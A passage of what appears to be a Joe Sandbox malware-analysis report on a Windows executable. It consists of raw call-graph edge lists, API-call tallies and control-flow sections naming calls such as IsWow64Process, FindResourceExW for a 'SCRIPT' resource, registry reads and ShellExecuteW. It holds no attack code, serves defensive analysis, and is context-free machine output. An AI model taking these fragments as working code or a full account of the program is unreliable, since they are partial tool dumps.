6c2fca 95586 67a961 22 API calls 95583->95586 95583->95595 95584 67a961 22 API calls 95584->95595 95585 6e359c 82 API calls 95585->95595 95589 6c2fe4 95586->95589 95657 6900a3 29 API calls __onexit 95589->95657 95591 6c2fee 95658 6901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95591->95658 95595->95584 95595->95585 95597 6804f0 22 API calls 95595->95597 95598 67ec40 348 API calls 95595->95598 95599 67e3e1 95595->95599 95653 67a8c7 22 API calls __fread_nolock 95595->95653 95654 67a81b 41 API calls 95595->95654 95655 68a308 348 API calls 95595->95655 95659 690242 5 API calls __Init_thread_wait 95595->95659 95660 6900a3 29 API calls __onexit 95595->95660 95661 6901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95595->95661 95662 6f47d4 348 API calls 95595->95662 95663 6f68c1 348 API calls 95595->95663 95597->95595 95598->95595 95599->95555 95604 68ee09 95602->95604 95606 68ee12 95602->95606 95603 68ee36 IsDialogMessageW 95603->95604 95603->95606 95604->95555 95605 6cefaf GetClassLongW 95605->95603 95605->95606 95606->95603 95606->95604 95606->95605 95607->95555 95608->95555 95609->95555 95610->95555 95611->95562 95612->95562 95613->95562 95615 67ec40 348 API calls 95614->95615 95616 67d29d 95615->95616 95617 67d6d5 95616->95617 95619 67d30b ISource 95616->95619 95620 67d3c3 95616->95620 95626 67d4b8 95616->95626 95629 68fddb 22 API calls 95616->95629 95632 6c1bc4 95616->95632 95641 67d429 ISource __fread_nolock 95616->95641 95617->95619 95630 68fe0b 22 API calls 95617->95630 95619->95576 95620->95617 95622 67d3ce 95620->95622 95621 67d5ff 95624 67d614 95621->95624 95625 6c1bb5 95621->95625 95623 68fddb 22 API calls 95622->95623 95634 67d3d5 __fread_nolock 95623->95634 95627 68fddb 22 API calls 95624->95627 95651 6f5705 23 API calls 95625->95651 95631 68fe0b 22 API calls 95626->95631 95638 67d46a 95627->95638 95629->95616 95630->95634 95631->95641 95652 6e359c 82 API calls __wsopen_s 95632->95652 95633 68fddb 22 API calls 95635 67d3f6 95633->95635 95634->95633 95634->95635 95635->95641 95647 67bec0 348 API calls 95635->95647 95637 6c1ba4 95650 6e359c 82 API calls __wsopen_s 95637->95650 95638->95576 95640 671f6f 348 API calls 95640->95641 95641->95621 95641->95637 95641->95638 95641->95640 95642 6c1b7f 95641->95642 95644 6c1b5d 95641->95644 95649 6e359c 82 API calls __wsopen_s 95642->95649 95648 6e359c 82 API calls __wsopen_s 95644->95648 95646->95578 95647->95641 95648->95638 95649->95638 95650->95638 95651->95632 95652->95619 95653->95595 95654->95595 95655->95595 95656->95583 95657->95591 95658->95595 95659->95595 95660->95595 95661->95595 95662->95595 95663->95595 94796 6b2ba5 94797 672b25 94796->94797 94798 6b2baf 94796->94798 94824 672b83 7 API calls 94797->94824 94842 673a5a 94798->94842 94802 6b2bb8 94804 679cb3 22 API calls 94802->94804 94806 6b2bc6 94804->94806 94805 672b2f 94813 672b44 94805->94813 94828 673837 94805->94828 94807 6b2bce 94806->94807 94808 6b2bf5 94806->94808 94849 6733c6 94807->94849 94809 6733c6 22 API calls 94808->94809 94822 6b2bf1 GetForegroundWindow ShellExecuteW 94809->94822 94814 672b5f 94813->94814 94838 6730f2 94813->94838 94820 672b66 SetCurrentDirectoryW 94814->94820 94818 6b2c26 94818->94814 94819 6b2be7 94821 6733c6 22 API calls 94819->94821 94823 672b7a 94820->94823 94821->94822 94822->94818 94859 672cd4 7 API calls 94824->94859 94826 672b2a 94827 672c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94826->94827 94827->94805 94829 673862 ___scrt_fastfail 94828->94829 94860 674212 94829->94860 94832 6738e8 94834 673906 Shell_NotifyIconW 94832->94834 94835 6b3386 Shell_NotifyIconW 94832->94835 94864 673923 94834->94864 94837 67391c 94837->94813 94839 673154 94838->94839 94840 673104 ___scrt_fastfail 94838->94840 94839->94814 94841 673123 Shell_NotifyIconW 94840->94841 94841->94839 94843 6b1f50 __wsopen_s 94842->94843 94844 673a67 GetModuleFileNameW 94843->94844 94845 679cb3 22 API calls 94844->94845 94846 673a8d 94845->94846 94847 673aa2 23 API calls 94846->94847 94848 673a97 94847->94848 94848->94802 94850 6b30bb 94849->94850 94851 6733dd 94849->94851 94853 68fddb 22 API calls 94850->94853 94895 6733ee 94851->94895 94855 6b30c5 _wcslen 94853->94855 94854 6733e8 94858 676350 22 API calls 94854->94858 94856 68fe0b 22 API calls 94855->94856 94857 6b30fe __fread_nolock 94856->94857 94858->94819 94859->94826 94861 6738b7 94860->94861 94862 6b35a4 94860->94862 94861->94832 94886 6dc874 42 API calls _strftime 94861->94886 94862->94861 94863 6b35ad DestroyIcon 94862->94863 94863->94861 94865 673a13 94864->94865 94866 67393f 94864->94866 94865->94837 94887 676270 94866->94887 94869 6b3393 LoadStringW 94872 6b33ad 94869->94872 94870 67395a 94871 676b57 22 API calls 94870->94871 94873 67396f 94871->94873 94880 673994 ___scrt_fastfail 94872->94880 94893 67a8c7 22 API calls __fread_nolock 94872->94893 94874 6b33c9 94873->94874 94875 67397c 94873->94875 94894 676350 22 API calls 94874->94894 94875->94872 94877 673986 94875->94877 94892 676350 22 API calls 94877->94892 94883 6739f9 Shell_NotifyIconW 94880->94883 94881 6b33d7 94881->94880 94882 6733c6 22 API calls 94881->94882 94884 6b33f9 94882->94884 94883->94865 94885 6733c6 22 API calls 94884->94885 94885->94880 94886->94832 94888 68fe0b 22 API calls 94887->94888 94889 676295 94888->94889 94890 68fddb 22 API calls 94889->94890 94891 67394d 94890->94891 94891->94869 94891->94870 94892->94880 94893->94880 94894->94881 94896 6733fe _wcslen 94895->94896 94897 6b311d 94896->94897 94898 673411 94896->94898 94900 68fddb 22 API calls 94897->94900 94905 67a587 94898->94905 94902 6b3127 94900->94902 94901 67341e __fread_nolock 94901->94854 94903 68fe0b 22 API calls 94902->94903 94904 6b3157 __fread_nolock 94903->94904 94906 67a59d 94905->94906 94909 67a598 __fread_nolock 94905->94909 94907 68fe0b 22 API calls 94906->94907 94908 6bf80f 94906->94908 94907->94909 94908->94908 94909->94901 94910 672e37 94911 67a961 22 API calls 94910->94911 94912 672e4d 94911->94912 94989 674ae3 94912->94989 94914 672e6b 94915 673a5a 24 API calls 94914->94915 94916 672e7f 94915->94916 94917 679cb3 22 API calls 94916->94917 94918 672e8c 94917->94918 94919 674ecb 94 API calls 94918->94919 94920 672ea5 94919->94920 94921 672ead 94920->94921 94922 6b2cb0 94920->94922 95003 67a8c7 22 API calls __fread_nolock 94921->95003 94923 6e2cf9 80 API calls 94922->94923 94924 6b2cc3 94923->94924 94925 6b2ccf 94924->94925 94927 674f39 68 API calls 94924->94927 94931 674f39 68 API calls 94925->94931 94927->94925 94928 672ec3 95004 676f88 22 API calls 94928->95004 94930 672ecf 94932 679cb3 22 API calls 94930->94932 94933 6b2ce5 94931->94933 94934 672edc 94932->94934 95021 673084 22 API calls 94933->95021 95005 67a81b 41 API calls 94934->95005 94937 672eec 94939 679cb3 22 API calls 94937->94939 94938 6b2d02 95022 673084 22 API calls 94938->95022 94941 672f12 94939->94941 95006 67a81b 41 API calls 94941->95006 94942 6b2d1e 94944 673a5a 24 API calls 94942->94944 94945 6b2d44 94944->94945 95023 673084 22 API calls 94945->95023 94946 672f21 94948 67a961 22 API calls 94946->94948 94950 672f3f 94948->94950 94949 6b2d50 95024 67a8c7 22 API calls __fread_nolock 94949->95024 95007 673084 22 API calls 94950->95007 94953 6b2d5e 95025 673084 22 API calls 94953->95025 94954 672f4b 95008 694a28 40 API calls 3 library calls 94954->95008 94957 6b2d6d 95026 67a8c7 22 API calls __fread_nolock 94957->95026 94958 672f59 94958->94933 94959 672f63 94958->94959 95009 694a28 40 API calls 3 library calls 94959->95009 94962 6b2d83 95027 673084 22 API calls 94962->95027 94963 672f6e 94963->94938 94965 672f78 94963->94965 95010 694a28 40 API calls 3 library calls 94965->95010 94966 6b2d90 94968 672f83 94968->94942 94969 672f8d 94968->94969 95011 694a28 40 API calls 3 library calls 94969->95011 94971 672fdc 94971->94957 94973 672fe8 94971->94973 94972 672f98 94972->94971 95012 673084 22 API calls 94972->95012 94973->94966 95015 6763eb 22 API calls 94973->95015 94975 672fbf 95013 67a8c7 22 API calls __fread_nolock 94975->95013 94978 672ff8 95016 676a50 22 API calls 94978->95016 94979 672fcd 95014 673084 22 API calls 94979->95014 94982 673006 95017 6770b0 23 API calls 94982->95017 94986 673021 94987 673065 94986->94987 95018 676f88 22 API calls 94986->95018 95019 6770b0 23 API calls 94986->95019 95020 673084 22 API calls 94986->95020 94990 674af0 __wsopen_s 94989->94990 94991 676b57 22 API calls 94990->94991 94992 674b22 94990->94992 94991->94992 94998 674b58 94992->94998 95028 674c6d 94992->95028 94994 679cb3 22 API calls 94996 674c52 94994->94996 94995 679cb3 22 API calls 94995->94998 94997 67515f 22 API calls 94996->94997 95000 674c5e 94997->95000 94998->94995 94999 67515f 22 API calls 94998->94999 95001 674c29 94998->95001 95002 674c6d 22 API calls 94998->95002 94999->94998 95000->94914 95001->94994 95001->95000 95002->94998 95003->94928 95004->94930 95005->94937 95006->94946 95007->94954 95008->94958 95009->94963 95010->94968 95011->94972 95012->94975 95013->94979 95014->94971 95015->94978 95016->94982 95017->94986 95018->94986 95019->94986 95020->94986 95021->94938 95022->94942 95023->94949 95024->94953 95025->94957 95026->94962 95027->94966 95029 67aec9 22 API calls 95028->95029 95030 674c78 95029->95030 95030->94992 95664 68f698 95665 68f6a2 95664->95665 95666 68f6c3 95664->95666 95673 67af8a 95665->95673 95671 6cf2f8 95666->95671 95681 6d4d4a 22 API calls ISource 95666->95681 95668 68f6b2 95670 67af8a 22 API calls 95668->95670 95672 68f6c2 95670->95672 95674 67af98 95673->95674 95680 67afc0 ISource 95673->95680 95675 67afa6 95674->95675 95676 67af8a 22 API calls 95674->95676 95677 67afac 95675->95677 95678 67af8a 22 API calls 95675->95678 95676->95675 95677->95680 95682 67b090 95677->95682 95678->95677 95680->95668 95681->95666 95683 67b09b ISource 95682->95683 95685 67b0d6 ISource 95683->95685 95686 68ce17 22 API calls ISource 95683->95686 95685->95680 95686->95685 95687 673156 95690 673170 95687->95690 95691 673187 95690->95691 95692 6731e9 95691->95692 95693 67318c 95691->95693 95694 6731eb 95691->95694 95695 6731d0 DefWindowProcW 95692->95695 95698 673265 PostQuitMessage 95693->95698 95699 673199 95693->95699 95696 6b2dfb 95694->95696 95697 6731f1 95694->95697 95700 67316a 95695->95700 95745 6718e2 10 API calls 95696->95745 95701 67321d SetTimer RegisterWindowMessageW 95697->95701 95702 6731f8 95697->95702 95698->95700 95704 6731a4 95699->95704 95705 6b2e7c 95699->95705 95701->95700 95709 673246 CreatePopupMenu 95701->95709 95706 673201 KillTimer 95702->95706 95707 6b2d9c 95702->95707 95710 6b2e68 95704->95710 95711 6731ae 95704->95711 95748 6dbf30 34 API calls ___scrt_fastfail 95705->95748 95715 6730f2 Shell_NotifyIconW 95706->95715 95713 6b2da1 95707->95713 95714 6b2dd7 MoveWindow 95707->95714 95708 6b2e1c 95746 68e499 42 API calls 95708->95746 95709->95700 95735 6dc161 95710->95735 95718 6b2e4d 95711->95718 95719 6731b9 95711->95719 95721 6b2da7 95713->95721 95722 6b2dc6 SetFocus 95713->95722 95714->95700 95723 673214 95715->95723 95718->95695 95747 6d0ad7 22 API calls 95718->95747 95724 6731c4 95719->95724 95725 673253 95719->95725 95720 6b2e8e 95720->95695 95720->95700 95721->95724 95726 6b2db0 95721->95726 95722->95700 95742 673c50 DeleteObject DestroyWindow 95723->95742 95724->95695 95732 6730f2 Shell_NotifyIconW 95724->95732 95743 67326f 44 API calls ___scrt_fastfail 95725->95743 95744 6718e2 10 API calls 95726->95744 95731 673263 95731->95700 95733 6b2e41 95732->95733 95734 673837 49 API calls 95733->95734 95734->95692 95736 6dc179 ___scrt_fastfail 95735->95736 95737 6dc276 95735->95737 95738 673923 24 API calls 95736->95738 95737->95700 95740 6dc1a0 95738->95740 95739 6dc25f KillTimer SetTimer 95739->95737 95740->95739 95741 6dc251 Shell_NotifyIconW 95740->95741 95741->95739 95742->95700 95743->95731 95744->95700 95745->95708 95746->95724 95747->95692 95748->95720 95031 6903fb 95032 690407 ___DestructExceptionObject 95031->95032 95060 68feb1 95032->95060 95034 69040e 95035 690561 95034->95035 95038 690438 95034->95038 95090 69083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 95035->95090 95037 690568 95083 694e52 95037->95083 95049 690477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 95038->95049 95071 6a247d 95038->95071 95045 690457 95047 6904d8 95079 690959 95047->95079 95049->95047 95086 694e1a 38 API calls 3 library calls 95049->95086 95051 6904de 95052 6904f3 95051->95052 95087 690992 GetModuleHandleW 95052->95087 95054 6904fa 95054->95037 95055 6904fe 95054->95055 95056 690507 95055->95056 95088 694df5 28 API calls _abort 95055->95088 95089 690040 13 API calls 2 library calls 95056->95089 95059 69050f 95059->95045 95061 68feba 95060->95061 95092 690698 IsProcessorFeaturePresent 95061->95092 95063 68fec6 95093 692c94 10 API calls 3 library calls 95063->95093 95065 68fecb 95070 68fecf 95065->95070 95094 6a2317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 95065->95094 95067 68fed8 95068 68fee6 95067->95068 95095 692cbd 8 API calls 3 library calls 95067->95095 95068->95034 95070->95034 95074 6a2494 95071->95074 95073 690451 95073->95045 95075 6a2421 95073->95075 95096 690a8c 95074->95096 95077 6a2450 95075->95077 95076 690a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 95078 6a2479 95076->95078 95077->95076 95078->95049 95104 692340 95079->95104 95082 69097f 95082->95051 95106 694bcf 95083->95106 95086->95047 95087->95054 95088->95056 95089->95059 95090->95037 95092->95063 95093->95065 95094->95067 95095->95070 95097 690a95 95096->95097 95098 690a97 IsProcessorFeaturePresent 95096->95098 95097->95073 95100 690c5d 95098->95100 95103 690c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 95100->95103 95102 690d40 95102->95073 95103->95102 95105 69096c GetStartupInfoW 95104->95105 95105->95082 95107 694bdb IsInExceptionSpec 95106->95107 95108 694be2 95107->95108 95109 694bf4 95107->95109 95145 694d29 GetModuleHandleW 95108->95145 95130 6a2f5e EnterCriticalSection 95109->95130 95112 694be7 95112->95109 95146 694d6d GetModuleHandleExW 95112->95146 95113 694c99 95134 694cd9 95113->95134 95117 694c70 95121 694c88 95117->95121 95126 6a2421 _abort 5 API calls 95117->95126 95119 694ce2 95154 6b1d29 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 95119->95154 95120 694cb6 95137 694ce8 95120->95137 95127 6a2421 _abort 5 API calls 95121->95127 95122 694bfb 95122->95113 95122->95117 95131 6a21a8 95122->95131 95126->95121 95127->95113 95130->95122 95155 6a1ee1 95131->95155 95174 6a2fa6 LeaveCriticalSection 95134->95174 95136 694cb2 95136->95119 95136->95120 95175 6a360c 95137->95175 95140 694d16 95143 694d6d _abort 8 API calls 95140->95143 95141 694cf6 GetPEB 95141->95140 95142 694d06 GetCurrentProcess TerminateProcess 95141->95142 95142->95140 95144 694d1e ExitProcess 95143->95144 95145->95112 95147 694dba 95146->95147 95148 694d97 GetProcAddress 95146->95148 95150 694dc9 95147->95150 95151 694dc0 FreeLibrary 95147->95151 95149 694dac 95148->95149 95149->95147 95152 690a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 95150->95152 95151->95150 95153 694bf3 95152->95153 95153->95109 95158 6a1e90 95155->95158 95157 6a1f05 95157->95117 95159 6a1e9c ___DestructExceptionObject 95158->95159 95166 6a2f5e EnterCriticalSection 95159->95166 95161 6a1eaa 95167 6a1f31 95161->95167 95165 6a1ec8 __wsopen_s 95165->95157 95166->95161 95168 6a1f51 95167->95168 95171 6a1f59 95167->95171 95169 690a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 95168->95169 95170 6a1eb7 95169->95170 95173 6a1ed5 LeaveCriticalSection _abort 95170->95173 95171->95168 95172 6a29c8 _free 20 API calls 95171->95172 95172->95168 95173->95165 95174->95136 95176 6a3631 95175->95176 95177 6a3627 95175->95177 95182 6a2fd7 5 API calls 2 library calls 95176->95182 95179 690a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 95177->95179 95181 694cf2 95179->95181 95180 6a3648 95180->95177 95181->95140 95181->95141 95182->95180 95749 6cd35f 95750 6cd30c 95749->95750 95752 6ddf27 SHGetFolderPathW 95750->95752 95753 676b57 22 API calls 95752->95753 95754 6ddf54 95753->95754 95754->95750 95755 6cd79f 95756 673b1c 3 API calls 95755->95756 95757 6cd7bf 95756->95757 95760 679c6e 22 API calls 95757->95760 95759 6cd7ef 95759->95759 95760->95759 95183 67fe73 95190 68ceb1 95183->95190 95185 67fe89 95199 68cf92 95185->95199 95187 67feb3 95211 6e359c 82 API calls __wsopen_s 95187->95211 95189 6c4ab8 95191 68cebf 95190->95191 95192 68ced2 95190->95192 95193 67aceb 23 API calls 95191->95193 95194 68cf05 95192->95194 95195 68ced7 95192->95195 95198 68cec9 95193->95198 95196 67aceb 23 API calls 95194->95196 95197 68fddb 22 API calls 95195->95197 95196->95198 95197->95198 95198->95185 95200 676270 22 API calls 95199->95200 95201 68cfc9 95200->95201 95202 679cb3 22 API calls 95201->95202 95203 68cffa 95201->95203 95204 6cd166 95202->95204 95203->95187 95212 676350 22 API calls 95204->95212 95206 6cd171 95213 68d2f0 40 API calls 95206->95213 95208 6cd184 95209 67aceb 23 API calls 95208->95209 95210 6cd188 95208->95210 95209->95210 95210->95210 95211->95189 95212->95206 95213->95208 95214 671033 95219 674c91 95214->95219 95218 671042 95220 67a961 22 API calls 95219->95220 95221 674cff 95220->95221 95227 673af0 95221->95227 95224 674d9c 95225 671038 95224->95225 95230 6751f7 22 API calls __fread_nolock 95224->95230 95226 6900a3 29 API calls __onexit 95225->95226 95226->95218 95231 673b1c 95227->95231 95230->95224 95232 673b0f 95231->95232 95233 673b29 95231->95233 95232->95224 95233->95232 95234 673b30 RegOpenKeyExW 95233->95234 95234->95232 95235 673b4a RegQueryValueExW 95234->95235 95236 673b80 RegCloseKey 95235->95236 95237 673b6b 95235->95237 95236->95232 95237->95236 95238 6cd27a GetUserNameW 95239 6cd292 95238->95239 95761 6cd29a 95764 6dde27 WSAStartup 95761->95764 95763 6cd2a5 95765 6dde50 gethostname gethostbyname 95764->95765 95767 6ddee6 95764->95767 95765->95767 95768 6dde73 __fread_nolock 95765->95768 95766 6dde87 95771 6ddede WSACleanup 95766->95771 95767->95763 95768->95766 95769 6ddea5 inet_ntoa 95768->95769 95770 6ddebe _strcat 95769->95770 95773 6debd1 95770->95773 95771->95767 95774 6dec37 95773->95774 95775 6debe0 _strlen 95773->95775 95774->95766 95776 6debef MultiByteToWideChar 95775->95776 95776->95774 95777 6dec04 95776->95777 95778 68fe0b 22 API calls 95777->95778 95779 6dec20 MultiByteToWideChar 95778->95779 95779->95774 95240 6c3f75 95241 68ceb1 23 API calls 95240->95241 95242 6c3f8b 95241->95242 95243 6c4006 95242->95243 95251 68e300 23 API calls 95242->95251 95245 67bf40 348 API calls 95243->95245 95246 6c4052 95245->95246 95250 6c4a88 95246->95250 95253 6e359c 82 API calls __wsopen_s 95246->95253 95248 6c3fe6 95248->95246 95252 6e1abf 22 API calls 95248->95252 95251->95248 95252->95243 95253->95250 95780 6cd255 95781 673b1c 3 API calls 95780->95781 95782 6cd275 95781->95782 95782->95782 95254 67defc 95257 671d6f 95254->95257 95256 67df07 95258 671d8c 95257->95258 95266 671f6f 95258->95266 95260 671da6 95261 6b2759 95260->95261 95263 671e36 95260->95263 95264 671dc2 95260->95264 95270 6e359c 82 API calls __wsopen_s 95261->95270 95263->95256 95264->95263 95269 67289a 23 API calls 95264->95269 95267 67ec40 348 API calls 95266->95267 95268 671f98 95267->95268 95268->95260 95269->95263 95270->95263 95783 67105b 95788 67344d 95783->95788 95785 67106a 95819 6900a3 29 API calls __onexit 95785->95819 95787 671074 95789 67345d __wsopen_s 95788->95789 95790 67a961 22 API calls 95789->95790 95791 673513 95790->95791 95792 673a5a 24 API calls 95791->95792 95793 67351c 95792->95793 95820 673357 95793->95820 95796 6733c6 22 API calls 95797 673535 95796->95797 95798 67515f 22 API calls 95797->95798 95799 673544 95798->95799 95800 67a961 22 API calls 95799->95800 95801 67354d 95800->95801 95802 67a6c3 22 API calls 95801->95802 95803 673556 RegOpenKeyExW 95802->95803 95804 6b3176 RegQueryValueExW 95803->95804 95809 673578 95803->95809 95805 6b320c RegCloseKey 95804->95805 95806 6b3193 95804->95806 95805->95809 95818 6b321e _wcslen 95805->95818 95807 68fe0b 22 API calls 95806->95807 95808 6b31ac 95807->95808 95811 675722 22 API calls 95808->95811 95809->95785 95810 674c6d 22 API calls 95810->95818 95812 6b31b7 RegQueryValueExW 95811->95812 95813 6b31d4 95812->95813 95815 6b31ee ISource 95812->95815 95814 676b57 22 API calls 95813->95814 95814->95815 95815->95805 95816 679cb3 22 API calls 95816->95818 95817 67515f 22 API calls 95817->95818 95818->95809 95818->95810 95818->95816 95818->95817 95819->95787 95821 6b1f50 __wsopen_s 95820->95821 95822 673364 GetFullPathNameW 95821->95822 95823 673386 95822->95823 95824 676b57 22 API calls 95823->95824 95825 6733a4 95824->95825 95825->95796 95826 671098 95831 6742de 95826->95831 95830 6710a7 95832 67a961 22 API calls 95831->95832 95833 6742f5 GetVersionExW 95832->95833 95834 676b57 22 API calls 95833->95834 95835 674342 95834->95835 95836 6793b2 22 API calls 95835->95836 95839 674378 95835->95839 95837 67436c 95836->95837 95838 6737a0 22 API calls 95837->95838 95838->95839 95840 67441b GetCurrentProcess IsWow64Process 95839->95840 95844 6b37df 95839->95844 95841 674437 95840->95841 95842 67444f LoadLibraryA 95841->95842 95843 6b3824 GetSystemInfo 95841->95843 95845 674460 GetProcAddress 95842->95845 95846 67449c GetSystemInfo 95842->95846 95845->95846 95848 674470 GetNativeSystemInfo 95845->95848 95847 674476 95846->95847 95849 67109d 95847->95849 95850 67447a FreeLibrary 95847->95850 95848->95847 95851 6900a3 29 API calls __onexit 95849->95851 95850->95849 95851->95830

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 389 6742de-67434d call 67a961 GetVersionExW call 676b57 394 674353 389->394 395 6b3617-6b362a 389->395 397 674355-674357 394->397 396 6b362b-6b362f 395->396 398 6b3632-6b363e 396->398 399 6b3631 396->399 400 67435d-6743bc call 6793b2 call 6737a0 397->400 401 6b3656 397->401 398->396 402 6b3640-6b3642 398->402 399->398 417 6b37df-6b37e6 400->417 418 6743c2-6743c4 400->418 406 6b365d-6b3660 401->406 402->397 405 6b3648-6b364f 402->405 405->395 408 6b3651 405->408 409 67441b-674435 GetCurrentProcess IsWow64Process 406->409 410 6b3666-6b36a8 406->410 408->401 413 674437 409->413 414 674494-67449a 409->414 410->409 411 6b36ae-6b36b1 410->411 415 6b36db-6b36e5 411->415 416 6b36b3-6b36bd 411->416 419 67443d-674449 413->419 414->419 423 6b36f8-6b3702 415->423 424 6b36e7-6b36f3 415->424 420 6b36ca-6b36d6 416->420 421 6b36bf-6b36c5 416->421 425 6b37e8 417->425 426 6b3806-6b3809 417->426 418->406 422 6743ca-6743dd 418->422 427 67444f-67445e LoadLibraryA 419->427 428 6b3824-6b3828 GetSystemInfo 419->428 420->409 421->409 429 6743e3-6743e5 422->429 430 6b3726-6b372f 422->430 432 6b3715-6b3721 423->432 433 6b3704-6b3710 423->433 424->409 431 6b37ee 425->431 434 6b380b-6b381a 426->434 435 6b37f4-6b37fc 426->435 436 674460-67446e GetProcAddress 427->436 437 67449c-6744a6 GetSystemInfo 427->437 439 6b374d-6b3762 429->439 440 6743eb-6743ee 429->440 441 6b373c-6b3748 430->441 442 6b3731-6b3737 430->442 431->435 432->409 433->409 434->431 443 6b381c-6b3822 434->443 435->426 436->437 444 674470-674474 GetNativeSystemInfo 436->444 438 674476-674478 437->438 445 674481-674493 438->445 446 67447a-67447b FreeLibrary 438->446 449 6b376f-6b377b 439->449 450 6b3764-6b376a 439->450 447 6743f4-67440f 440->447 448 6b3791-6b3794 440->448 441->409 442->409 443->435 444->438 446->445 452 674415 447->452 453 6b3780-6b378c 447->453 448->409 451 6b379a-6b37c1 448->451 449->409 450->409 454 6b37ce-6b37da 451->454 455 6b37c3-6b37c9 451->455 452->409 453->409 454->409 455->409
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 0067430D
                                                                                                                                                                                                                                                                  • Part of subcall function 00676B57: _wcslen.LIBCMT ref: 00676B6A
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,0070CB64,00000000,?,?), ref: 00674422
                                                                                                                                                                                                                                                                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00674429
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00674454
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00674466
                                                                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00674474
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0067447B
                                                                                                                                                                                                                                                                • GetSystemInfo.KERNEL32(?,?,?), ref: 006744A0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                • Opcode ID: 7c17c820c89ce531cc86eefb84a8e054b144d3e397acbd4726a11a2028537fbe
                                                                                                                                                                                                                                                                • Instruction ID: 52e149f21108ddbf099263fbf9a3d0187ab8dd29004b9816eafda8a823108947
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c17c820c89ce531cc86eefb84a8e054b144d3e397acbd4726a11a2028537fbe
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CFA1D5BA90A2D0CFC712EF697C441E47FE6AB27340B84C5AAD04593B26E72C45C5DB2D

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1977 6742a2-6742ba CreateStreamOnHGlobal 1978 6742bc-6742d3 FindResourceExW 1977->1978 1979 6742da-6742dd 1977->1979 1980 6b35ba-6b35c9 LoadResource 1978->1980 1981 6742d9 1978->1981 1980->1981 1982 6b35cf-6b35dd SizeofResource 1980->1982 1981->1979 1982->1981 1983 6b35e3-6b35ee LockResource 1982->1983 1983->1981 1984 6b35f4-6b3612 1983->1984 1984->1981
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,006750AA,?,?,00000000,00000000), ref: 006742B2
                                                                                                                                                                                                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,006750AA,?,?,00000000,00000000), ref: 006742C9
                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,006750AA,?,?,00000000,00000000,?,?,?,?,?,?,00674F20), ref: 006B35BE
                                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,006750AA,?,?,00000000,00000000,?,?,?,?,?,?,00674F20), ref: 006B35D3
                                                                                                                                                                                                                                                                • LockResource.KERNEL32(006750AA,?,?,006750AA,?,?,00000000,00000000,?,?,?,?,?,?,00674F20,?), ref: 006B35E6
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
